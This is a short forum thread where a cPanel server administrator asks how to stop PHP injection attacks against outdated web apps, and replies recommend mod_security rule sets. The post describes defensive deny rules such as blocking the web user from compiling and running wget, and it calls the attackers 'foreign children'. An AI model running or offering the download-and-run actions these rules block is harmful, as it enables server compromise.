Preventing PHP Injection

[cdick@ocis.net]

Yo dudes,

Recently we've been having issues on our CPanel box with people running old or outdated versions of postnuke or similar php applications that have been found to have php injection exploits.

Of course, I've done all the typical security stuff like mounting temp directories noexec nosuid, blocking user "nobody" from compiling and wgetting, etc, but that doesn't deter these foreign children from hacking these sites and just running perl scripts. Of course, I have a set up in place that checks all the processes running as nobody against a list of whitelisted procs (httpd proftpd, etc) but it still ends up alerting me, sometimes at midnight.

Is there anything I've missed? I thought about making /usr/bin/perl unexecutable by nobody but I figure that will break all perl CGI on the box.

Can anyone suggest anything? I can always clean this attack up, but only after it happens. I've taken to chmod 000'ing any vulnerable script as soon as it's exploited as well, so it can't be exploited again. This breaks the users script, of course, but as far as I'm concerned, that's not really my problem :-)


I'm hoping there's something simple that I missed.

My unending thanks go out to all of you.

[rhenderson]

We have been using mod_security to stop php injection.

[dave9000]

Mod_security will stop the injections if you set your rules up correctly. There are mutliple sites that have rule sets available for free to use. You just copy them into your mod_security rule set but you will need to check your sites closely to make sure you didnt break some of the pages.

Here is a relative complete set, We use parts of them as the complete set breaks some of our sites.

http://www.gotroot.com/tiki-index.ph...security+rules